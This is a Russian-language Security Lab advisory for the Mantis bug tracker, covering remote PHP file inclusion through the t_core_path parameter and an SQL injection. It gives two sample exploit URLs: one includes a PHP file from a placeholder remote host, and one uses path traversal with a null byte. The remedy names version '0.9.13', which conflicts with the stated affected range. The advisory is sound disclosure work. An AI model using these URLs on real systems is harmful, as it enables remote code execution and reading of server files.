Security Lab

PHP-инклюдинг и SQL-инъекция в Mantis

Дата публикации:28.10.2005
Дата изменения:17.10.2006
Всего просмотров:2219
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Mantis версии до 0.19.13

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести SQL-инъекцию и выполнить произвольные команды на системе.

1. Уязвимость существует при обработке входных данных в параметре t_core_path в сценарии bug_sponsorship_list_view_inc.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Для успешной эксплуатации уязвимости должна быть включена опция register_globals. Пример:

http://[host]/bug_sponsorship_list_view_inc.php?t_core_path=http://[host]/[file].php?
http://[host]/bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../[file]%00

2. SQL-инъекция возможна из-за недостаточной обработки входных данных в некоторых параметрах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды на целевой системе.

URL производителя: www.mantisbt.org

Решение: Установите последнюю версию (0.9.13) с сайта производителя.
sourceforge.net/project/showfiles.php?group_id=14963

Источник:

Ссылки: Mantis "t_core_path" File Inclusion Vulnerability